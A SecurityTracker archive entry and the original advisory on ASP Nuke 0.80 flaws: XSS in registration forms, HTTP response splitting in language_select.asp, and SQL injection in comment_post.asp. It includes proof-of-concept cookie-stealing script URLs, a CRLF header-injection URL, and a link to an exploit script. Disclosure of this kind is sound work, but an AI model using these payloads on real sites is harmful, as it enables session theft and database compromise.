SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Forum/Board/Portal)  >   ASP Nuke Vendors:   aspnuke.com
ASP Nuke Input Validation Holes Permit SQL Injection, HTTP Response Splitting, and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014310
SecurityTracker URL:  http://securitytracker.com/id/1014310
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 27 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.80 and prior versions
Description:   Several vulnerabilities were reported in ASP Nuke. A remote user can conduct SQL injection, cross-site scripting, and HTTP response splitting attacks.

The 'forgot_password.asp' script does not properly validate user-supplied input in the 'email' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASP Nuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'register.asp' script is also affected in several parameters, as shown in the following demonstration exploit URLs:

http://[target]/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Password=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address1=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?ZipCode=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Email=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

The 'language_select.asp' script does not properly validate user-supplied input in the 'LangCode' parameter. A remote user can submit a specially crafted URL to cause the target server to return a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.

A demonstration exploit URL is provided:

http://[target]/module/support/language/language_select.asp?action=go
&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

The 'comment_post.asp' script does not properly validate user-supplied input in the 'TaskID' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

The vendor has been notified.

Alberto Trivero reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASP Nuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can create a URL that, when loaded by the target user, will cause arbitrary content to be displayed.

A remote user may be able to poison any intermediate web caches with arbitrary content.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aspnuke.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke


M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80

Published: 26 16 2005
Released: 26 16 2005
Name: ASP Nuke
Affected Systems: <= 0.80
Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection
Author: Alberto Trivero
Vendor: http://www.aspnuke.com/



Software Description

***********


"ASP Nuke is an open-source software application for running a
community-based web site on a web server. By open-source, we mean the code
is freely available for others to read, modify and use in accordance with
the software license. ASP Nuke is an extensible framework that allows you to
upgrade and add applications to the website quickly and easily. It uses a
modular architecture allowing others to rapidly develop new modules and site
operators to re-organize the layout and navigation for their site."



Cross-Site Scripting (XSS)

***********


Let's look at code from /module/account/register/forgot_password.asp at line
33 and 103:

    <?
    ...
    sEmail = steForm("Email")
    ...
    <TR>
 <TD class="forml">
 <% steTxt "E-Mail" %> (req)<BR>
 <INPUT TYPE="text" NAME="email" VALUE="<%= sEmail %>" SIZE="22"
MAXLENGTH="80" class="form">
 </TD>
    </TR>
    <TR>
    ...
    ?>

As we can see there isn't any control on the 'email' parameter when the
board get it's value.
Since the value of the parameter is put in the HTML page as is, an attacker
can do an XSS attack with an URL like this:


http://www.example.com/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

On the same line there are others parameters that aren't properly sanitised.
These are some PoC URLs:


http://www.example.com/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Password=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address1=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Address2=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?City=%22%3E%3Csc
ript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cs
cript%3Ealert(document.cookie)%3C/script%3E



HTTP Response Splitting

***********


Let's look at code from /module/support/language/language_select.asp at line
31:

    <?
    ...
    If steForm("action") = "go" Then
        ' make sure the required fields are present
        If Trim(steForm("LangCode")) = "" Then
            sErrorMsg = steGetText("Please select a language from the list
below")
        Else
            ' redirect to the language administration
            Response.Redirect "tran_list.asp?langcode=" &
steEncForm("LangCode")
        End If
    End If
    ...
    ?>

When the redirect, that this piece of code do, happend, it's possibile to do
a CRLF injection attack thanks to an unexisting sanitisation. This is a Poc
URL:


http://www.example.com/module/support/language/language_select.asp?action=go
&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

These are examples of HTTP headers:

    Request:
        POST
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0
aSet-Cookie%3Asome%3Dvalue HTTP/1.0
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
        Host: www.aspnuke.com
        Content-Length: 90
        Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
        Connection: Close

    Response:
        HTTP/1.1 302 Object moved
        Server: Microsoft-IIS/5.0
        Date: Sun, 15 May 2005 11:31:37 GMT
        Pragma: no-cache
        Location: tran_list.asp?langcode=trivero
        Set-Cookie: some=value
        Connection: Keep-Alive
        Content-Length: 121
        Content-Type: text/html
        Expires: Sun, 15 May 2005 11:30:38 GMT
        Cache-control: no-cache



SQL Injection

***********


Let's look at code from /module/support/task/comment_post.asp at line 36 and
75:

    <?
    ...
    nTaskID = steNForm("TaskID")
    ...
    If sErrorMsg = "" Then
        ' prevent dup posting here
        sStat = "SELECT TaskID " &_
            "FROM tblTaskComment " &_
            "WHERE TaskID = " & nTaskID & " " &_
            "AND Subject = '" & Replace(sSubject, "'", "''") & "' " &_
            "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
    ...
    ?>

As we can see there isn't any control on the 'TaskID' parameter when the
board get it's value. Since the value of the parameter is put in the SQL
query without sanitisation, an attacker can do an SQL injection attack. I've
made an exploit for this vulnerability that it's able to recover the admin's
username and the SHA256 hash of his password available at this address:
http://albythebest.altervista.org/aspnuke.pl



Solution

***********


The vendor has been contacted many times but a patch was not yet produced.



Alberto Trivero - trivero@jumpy.it
Come cheer us at #security-it on Freenode ( irc.freenode.net )
(C) 2005 Copyright by Madroot Security Group

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2018, SecurityGlobal.net LLC